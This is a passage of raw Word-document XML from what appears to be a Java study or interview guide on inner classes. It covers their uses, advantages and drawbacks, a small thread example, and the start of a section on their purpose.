          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ncapsulating Helper Classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When a helper class is only used within the outer class, defining it as an inner class improves encapsulation. This allows it to access private members of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F3365" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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terator Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inner classes can implement iterators within the class they are iterating over. It provides a clean way to manage the iteration over data in the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E373E0" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Accessing Outer Class Members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inner classes have direct access to the outer class's members, which is useful when inner classes need to manipulate or access data from the outer class, especially in multi-threaded environments or event-driven systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE11379" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sometimes, inner classes are used to define and run threads that need to interact with the outer class’s state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBDE3A4"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785410"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OuterClass</w:t>
      </w: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72D2D92D"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785410"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> message </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Hello, Thread!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE281F2"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785410"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159FD84A"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785410"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InnerThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w: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30394B47"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785410"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> run</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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2109A5B5"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785410"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Accessing outer class variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A26CC1A"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785410"/>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0D70AF88"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785410"/>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370A9CB8"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785410"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2B0E0B"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785410"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> startThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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67C6959C"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785410"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InnerThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InnerThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486664CD"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785410"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B35F23A" w14:textId="77777777"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785410"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619B364D" w14:textId="6CC6D223" w:rsidR="00636B83" w:rsidRPr="00636B83" w:rsidRDefault="00636B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785410"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B0FB96" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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dvantages of Using Inner Classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB090F9" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38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ncapsulation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inner classes help to logically group classes together, making the code more organized and reducing potential conflicts with other classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B64E03" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38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 to Outer Class Members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inner classes have direct access to all members (including private members) of the outer class, which simplifies implementation when the inner class needs to interact closely with the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DBB3B6" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38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vent Handling and Callbacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inner classes are often used in event-driven programming, especially with GUI frameworks (Swing, JavaFX) where you can define event listeners or callbacks directly within the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148A392B" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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isadvantages of Inner Classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BFD767" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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creased Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Too many inner classes in a class can make the code harder to understand and maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB74768" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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ight Coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inner classes are tightly coupled with their outer class, meaning they cannot be reused in other contexts without also involving the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413B5B70" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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1D2FBEDE" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:jc w:val="both"/>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inner classes are a powerful tool in Java, allowing you to group logically related classes together and access the outer class's members. However, they should be used judiciously to avoid unnecessary</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complexity in the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F1D061" w14:textId="13355BB0"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88C8E22">
          <v:rect id="_x0000_i1180" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A69232B" w14:textId="73FE6A66" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00A2479C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc196307533"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the purpose of inner class</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="745A50B1" w14:textId="13A311F9" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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urpose of an Inner Class in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D68006" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E488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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inner class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is a class defined within another class. The primary purpose of an inner class is to logically group classes that are used in only one place, and to allow them to access the members (including private members) of the outer class. Here are some specific purposes and benefits of using inner classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFA4B69" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E488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Encapsulation and Logical Grouping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2BBDD5" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
